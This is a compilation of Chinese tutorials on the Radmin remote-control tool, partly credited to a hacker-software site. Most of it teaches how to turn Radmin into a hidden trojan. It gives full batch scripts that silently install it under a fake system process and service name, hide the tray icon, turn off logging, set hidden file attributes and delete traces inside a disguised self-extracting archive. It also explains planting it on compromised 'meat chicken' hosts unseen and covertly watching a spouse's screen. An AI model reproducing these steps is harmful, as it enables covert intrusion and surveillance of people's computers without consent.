radmin的使用教程总结.docx

我装自己架设服务器的时候问过很多人，问他们用什么远程控制软件比较好，都说用 radmin3.2 影子版，一个很重要的原因就是它不被杀毒软件查杀， 而且速度非常快， 界面也是简洁美观，可以说是高手的最爱，但是缺少一个反向连接的功能，不过对于我们控制服务器来说，反向连接也是多余的，今天我给大家带来一个 radmin 的智能化一键安装成新的服务或者替换成系统已有的服务， 这样做的好处当然是谁都知道进程不会被简单 k 掉，而且不用担心开机自启动的问题。好，接下来我们开始。首先配置服务端，很简单的几个设置，这里我用的是影子汉化版 3.2，隐藏任务栏图标是肯定的了，改端口为 2046（这个电影我至今看不懂，所以就用它了） ，如图一好了，这样就生成了 r_server 这个服务端，双击执行这里是没有效果的，不信你可以试试，我们需要在命令行下把它安装成服务，但是它默认的服务名称和显示名称分别是 r_server 和 remote administrator service并且没有服务的描述，双击服务会看到进程所在的路径，如图二，三同时在任务管理器下 radmin 的进程 r_server 会显得很刺眼。思路是这样的，用 rar 的自解压包将 radmin 的相关文件解压到系统目录，然后用批处理将 radmin 安装成服务，并且改名，最后删掉痕迹，是不是很爽啊！Radmin 的服务安装在注册表中有 2 个地方，分别在HKEY_LOCAL_MACHINESYSTEMRAdmin和HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesr_server再如图四把 radmin 改名为一个系统进程名， 我这里用的是 services， 因为服务名将来也要显示在进程中的，所 以 起 个 和 系 统 进 程 名 一 样 的 名 字 ， 只 是 真 正 的 services 在 system32 目 录 下 ， 我 换 个 目 录 ， 在system32WBEM。radmin 运行需要 raddrv.dll 和 admdll.dll 这两个动态链接库的支持，sc 用来改服务描述名 ， 2.bat 就 是 批 处 理 了 。 我 们 将 这 五 个 文 件 做 成 一 个 自 解 压 包 ， 并 让 它 自 解 压 到systemrootsystem32WBEM 目录下，systemroot顾名思义是系统目录，用来适应不同的操作系统，然后在高级自解压选项里的常规选项卡的解压后运行中填上主角批处理文件，如图五在模式选项卡的安静模式选全部隐藏，覆盖方式选择覆盖所有文件，如图六图标可以自己改一个，我就不说了。再来说批处理，在 radmin 的配置界面安装服务，然后将HKEY_LOCAL_MACHINESYSTEMRAdmin主键导出，接着把它用批处理命令写入 server.reg 这个自己建立的注册表文件中，注意关闭回显。这之前先把 services 注 册 成 服 务 ， 注 意 选 择 安 静 模 式 ， 这 样 注 册 的 问 题 在 于 没 有 了HKEY_LOCAL_MACHINESYSTEMRAdmin主键的配置信息，所以我们才要后来补上。echo offservices.exe /install /silenceecho Windows Registry Editor Version 5.00 c:server.regecho HKEY_LOCAL_MACHINESYSTEMRAdmin c:server.regecho HKEY_LOCAL_MACHINESYSTEMRAdminv2.0 c:server.regecho HKEY_LOCAL_MACHINESYSTEMRAdminv2.0Server c:server.regecho HKEY_LOCAL_MACHINESYSTEMRAdminv2.0Serveriplist c:server.regecho HKEY_LOCAL_MACHINESYSTEMRAdminv2.0ServerParameters c:server.regecho Porthex:fe070000 c:server.regecho Timeouthex:0a000000 c:server.regecho EnableLogFilehex:00000000 c:server.regecho LogFilePathc:logfile.txt c:server.regecho FilterIphex:00000000 c:server.regecho DisableTrayIconhex:01000000 c:server.regecho AutoAllowhex:00000000 c:server.regecho AskUserhex:00000000 c:server.regecho EnableEventLoghex:00000000 c:server.regecho NTAuthIdhex:02000000 c:server.regecho NTAuthEnabledhex:00000000 c:server.regecho Parameterhex:0d6f92cec29c9f0afb6a6a5465153e53 c:server.regregedit /s c:server.reg写完后用regedit /s c:server.reg 这个语句安静地将我们写好的注册表文件导入net start r_serverattrib r h s systemrootsystem32WBEMservices.exeattrib r h s systemrootsystem32WBEMAdmdll.dllattrib r h s systemrootsystem32WBEMraddrv.dll接着启动 r_server 服务，因为默认安装的服务名是 r_server，启动之后才能改它的显示名称。还做了一个工作就是加了只读，系统和隐藏属性，这步工作你可以做，也可以不做。下面来改注册表的描述名称：echo Windows Registry Editor Version 5.00 c:ip.reg本篇文章来源于 黑软基地-中国最大的黑客软件安全教程下载站！ 技术学院） 原文链接：（/article/sort0135/sort0181/Hackvip_13013.htmlecho HKEY_LOCAL_MACHINESYSTEMControlSet001Servicesr_server c:ip.regecho Description动态数据交换的网络传输的管理服务。 c:ip.regregedit /s c:ip.reg是不是很具有诱惑力？接着是改显示名称和一些扫尾工作del c:ip.reg /f /qdel c:server.reg /f /qsc config r_server displayname Network DDE Managementdel systemrootsystem32WBEMsc.exe /f /qdel systemrootsystem32WBEM2.bat /f /q显示名称要用到 sc，用写注册表的方法是行不通的，我试过了，注意 sc 的用法，不会地可以查资料。我起的显示名称是不是同样具有诱惑力？哈哈奸笑中试着运行一下那个可爱的自解压文件（因为换了图标，所以很像普通的可执行文件） ，会蹦出 cmd 窗口运行一会儿，不小心看一下就过去了，当然这也是有待改进的地方，本人材疏学浅，哪位高人如果能作出了不闪的效果不要忘了跟我说一声哦！调出任务管理器，可以看到有 2 个 services，结束试试？都是关键进程，哈哈，目的达到了。你不是一直都想要做一个不容易被结束的进程吗？服务是一个很好的选择哦！这里只是做了一个示范，大家看懂了之后可以尽你的想象力自由发挥，做一个说不定连我都会被忽悠过去的服务哦！接着再来做替换服务，以 Alerter 为例吧，Alerter 服务提供系统管理级警报的服务，不开也没什么太大影响，而且默认是自启动的哦！实际上我们将安装好后的 radmin 服务的配置替换 alter 的配置就可以了，这是 我 试 验 后 得 出 的 结 论 。 接 着 上 面 的 ， 把HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesr_server键值导出， 这里取名叫 alerter.reg，那么我们的批处理就是这么写了：echo offecho Windows Registry Editor Version 5.00 c:server.regecho HKEY_LOCAL_MACHINESYSTEMRAdmin c:server.regecho HKEY_LOCAL_MACHINESYSTEMRAdminv2.0 c:server.regecho HKEY_LOCAL_MACHINESYSTEMRAdminv2.0Server c:server.regecho HKEY_LOCAL_MACHINESYSTEMRAdminv2.0Serveriplist c:server.regecho HKEY_LOCAL_MACHINESYSTEMRAdminv2.0ServerParameters c:server.regecho Porthex:fe070000 c:server.regecho Timeouthex:0a000000 c:server.regecho EnableLogFilehex:00000000 c:server.regecho LogFilePathc:logfile.txt c:server.regecho FilterIphex:00000000 c:server.regecho DisableTrayIconhex:01000000 c:server.regecho AutoAllowhex:00000000 c:server.regecho AskUserhex:00000000 c:server.regecho EnableEventLoghex:00000000 c:server.regecho NTAuthIdhex:02000000 c:server.regecho NTAuthEnabledhex:00000000 c:server.regecho Parameterhex:0d6f92cec29c9f0afb6a6a5465153e53 c:server.regregedit /s c:server.regregedit /s systemrootsystem32WBEMalerter.regattrib r h s systemrootsystem32WBEMservices.exeattrib r h s systemrootsystem32WBEMAdmdll.dllattrib r h s systemrootsystem32WBEMraddrv.dlldel c:server.reg /f /qdel systemrootsystem32WBEMalerter.reg /f /qdel systemrootsystem32WBEM3.bat /f /q本测试在 2003server 上通过。RADMIN 的详细使用方法 一:介绍正向远程控制软件- RADMIN二:原理公网.即国际互联网（Internet），它是把全球不同位置、不用规模的计算机网络（包括局域网、城域网、广域网）相互连接在一起所形成的计算机网络的集合体。我们通常所浏览的 WWW 站点、FTP 站点等简单的说家用 ADSL 拨号上网所获得的 IP 就是公网的 IP内网.内网即本地局域网（LAN） ，例如公司内部网、校园网、家庭网和网吧局域网等端口.简单来说就是，计算机跟外界联能所要用的出口（门） ，关了门，别人就进不了了RADMIN远程屏幕捕捉远程文件管理远程屏幕操作远程 CMD 执行命令.1。下载并且解压完成后可以看到 2 个文件一个是 Radmin.exe.运行 RAedit 配置其信息 端口填写你所需要的2。将配置出来的上传到虚拟机，在这里我直接拖过去。这步我们称为木马上传可以通过许多方式.我就不解释了现在3。在虚拟机上运行 server 运行完后该文件会被自动删除4。打开 Radmin 添上地址我虚拟机的地址是 04（可以在虚拟机上输入 ipconfig 查得）端口上写上刚才配置的时候选的端口 123455。点击连接.稍等片刻就可以看到虚拟机的界面思考：虽然 Radmin 有着强大的屏幕显示功能但是它有什么地方不能实现？虚拟机是和你同在一个局域网内可以控制那么假设你要控制的机子在一个网吧里（内网不直接和网络相连）而你与网络直接相连（外网）那么你能不能通过 Radmin 直接连接到他的机子捏？答案是非常肯定的/不能直接与其相连因为网吧里的所有机子都是共用一个外网 IPRadmin 也只能连到那个 IP 上而无法找到那台你要控制的机子那么有没办法解决这个问题捏？有 但是前提是你能进入网吧的路由管理将一个端口信息转发给那台你所要控制的机子总结：在这节里我们练习了一款名为 Radmin 的远程控制软件的运用同样的我们也对内网，外网等基本概念有所了解也意识到 Radmin 这款软件的正向连接的局限性. radmin 的使用教程如果说 Radmin 是木马，可能不太确切。它是少数被官方承认的远程控制软件，因而不会被 XX 防火墙或者 XX 克星揪出来。但是，Radmin 以其强大的功能，纤小的体积，良好的隐蔽性，容易操作的优势让众多初学者青睐。下面，我们来初步介绍下 Radmin 的安装和使用。第一章 Radmin 的初步设置首先我们需要下载 Radmin2.1 版的安装程序，选择 2.1 版，因为它比较成熟可靠。由于是官方认可的软件，所以只要在百度搜索“Radmin2.1 破解”即可。注意破解二字，要有注册码的！这里因为不想盗链，所以没直接给出下载地址，请大家自己搜索。不推荐下载影子版。一是，影子版解压缩时可能会被杀毒软件查杀；二是，影子版是完成品，不适合初学者，毕竟自己多做些基础工作，可以打下扎实的基本功。下载后，安装。最好你的系统是 W2K，原因就不多说了。安装完成后，选择 Radmin 的设置选项。这时，你会看到弹出一个选项窗口。下面我们逐个介绍窗口中选项的功能。首先是 IP 过滤。对新人而言，我是不建议设置 IP 过滤的，理由是尽量减少自己暴露的信息。所以，这个选项我们跳过。其次是端口，默认的端口是 4899。我们可以改一下，具体用哪个端口随自己喜好，可以随便编，但注意不要使用 139，445，3389，4899 这样声名在外的端口，即使肉鸡嫩，你就不怕别的老大抢了你的肉鸡？如果不懂哪些端口是做什么用的，可以发邮件给我，我会将详细的资料发给你。然后就是隐藏托盘图表的选项了，不想被肉鸡的主人看见托盘有个不怀好意的图标在跟他奸笑的话，那就点上吧。使用日志记录，日志文件名不要选。会留痕迹的哦！连接确认也不要理它，价值不大。选项 OK 了，我们再 Radmin 的设置设置口令，就是密码。内容自己决定。建议不要设置暴露自己信息的内容。 。呵呵都设置好了，我们就开始安装服务吧。方法是 Radmin 的设置安装服务。点一下就可以了_第二章 木马的制作首先，是在安装目录下找到这 3 个文件。”AdmDll.dll” “r_server.exe” “raddrv.dll”把它们复制，粘贴到安全的地方。然 后 ， 是 导 出 注 册 表 ， 方 法 是 ： 开 始 - 运 行 - 输 入 regedit- 在 打 开 的 注 册 表 编 辑 器 里 找 到HKEY_LOCAL_MACHINE-在该项目中找到 SOFTWARE 项-在这个项目里， 我们看到一个熟悉的名字Radmin，还等什么，点击选择。在注册表编辑器的工具栏里，就是左上脚，有一个注册表R，看到吗？点击导出注册表文件注意保存的文件名“radmin.reg”，怎么样，你导出来了吗？现在有了上面 2 步准备的 4 个文件，我们的木马就已经 OK 了。简单吧！忘记强调，做好了木马，最后要注意移除服务哦。原因。呵呵 。第三章 控制台的安装建议删除刚才安装 radmin2.1 版本，重新下载安装 radmin3.0，3.0 版的画面细致，性能稳定。上面不安装3.0 版的原因是，这个版现在只有控制台，没有服务端。以后推出的话，我会补充新的教程。如果不想安装，直接使用 2.1 的 radmin 查看器就可以了。第四章 木马的安装把作为木马的 4 个文件上传到肉鸡上了，方法别的版块会详细介绍。建议上传到 SYSTEM32，因为这里文件比较多，嘿嘿。上传以后，DOS 环境在 SYSTEM32 目录下，运行以下 3 个命令，注意参数！regedit /s radmin.reg 导入注册表）r_server /install /silence 安装 radmin注意参数/silencenet start r_server 启动 radmin强调下，参数/silence 是取消安装画面用的，不加，肉鸡会看见什么呢？呵呵。 。 。呵呵。另外，你也可以自己写一个批处理文件自动执行，甚至制作一个 exe，这个就是个人的发挥了。第五章 连接肉鸡运行控制台以后，Connection-连接Connect to连接到-填写 I 肉鸡 P 地址，第一次连接的话，建议只选择 View Only只查看，以后可以根据需要，选择 Full Control完全控制。当然，不要忘记，把端口改成刚才自己设定的哦。直入正题了 Radmin 是一款非常好用的远程控制软件，做运维或者网络管理的朋友们管理服务器不可或缺的工具首先 Radmin 属于一个 CS（Client/Server）结构的软件 也就是说软件分为客户端和服务端在上面的链接中下载 Radmin 以后可以看到软件列表如下：radmin34cn.zip -keymaker.exe 注册机 用于注册服务器端软件 -rserv34cn.exe 服务器端 服务器安装（收费软件可使用注册机注册） -rview34cn.exe 客户端 用于连接服务器（免费软件）第一步：安装服务端首先我们先把 rserv34cn.exe 和 keymaker.exe 放到服务器上，然后运行 rserv34cn.exe 安装过程中只需要下一步即可没有需要特别设置的地方：安装完毕服务端后在计算机的托盘图标里面会有一个 Radmin server 的托盘 这时我们可以打开keymaker.exe 点击 激活 一直到软件提示下图既是已经激活这时我们在开始菜单 程序中找到 radmin server 点击启动 radmin 服务器 （以后 radmin 会开机自动启动）启动后我们在右下角托盘图标 找到 radmin server 点击右键 点击服务器设置 如下图：在图中我们可以看到 radmin 已经授权成功了接着我们在服务器设置窗口上 点击 选项 这里面是 radmin 的一些高级功能（常用的是修改默认连接端口 和如果需要指定的 IP 地址才可以连接 radmin 服务器可以启用 IP 过滤器 ）设置完毕后点击确定 点击 使用权限 使用 radmin 权限 来添加一个用户 并设置权限 如果是自用可以是勾选全部权限 如果是用于培训可以选择 屏幕查看的权限 用户可以是数字或者字母 或者汉字至此服务器端设置完毕第二步：在自己的电脑上安装客户端直接打开压缩包里面的 rview34cn.exe 默认安装即可 安装完毕后 在开始菜单 程序中 找到Radmin Viewer 3 打开 Radmin Viewer 3 界面如下：点击软件上的 号图标增加一个服务器连接以服务器地址为内网地址 10 端口为 4899为例 信息如下：设置完毕后点击确定完成添加双击添加好的服务器连接 双击 输入账号密码即可连接然后就会连接到服务器上 如下图： 此帖被 apple 在 2011-06-08 13:33 重新编辑 点评：有时候某种需求，例如查看老婆的电脑在跟谁聊天直接查看屏幕，比用 3389 好多了，3389 无法看到她正在干什么，其实我这次主要是因为一台高配电脑无显示器用另外一台电脑控制下。局域网内啊，具体看教程。1、第一件事就是下载 radmin 远程控制软件，网上有很多提供的，但比较好用的还是脚本之家提供的这个了，方便从各个方面来控制与配置服务器端。下载过程中会提示病毒什么的，哎没办法，很多这类软件都被黑客用烂了，大家可以设为信任即可。实在不行就临时将杀毒软件禁用下。Radmin 远程控制软件控制台与服务端打包2、解压后在想要被控制的电脑上安装 Radmin_server 文件夹的内容。Radmin_server 这个文件夹为服务器端。直接运行 install.bat 是不行的，因为这个是为肉鸡准备的，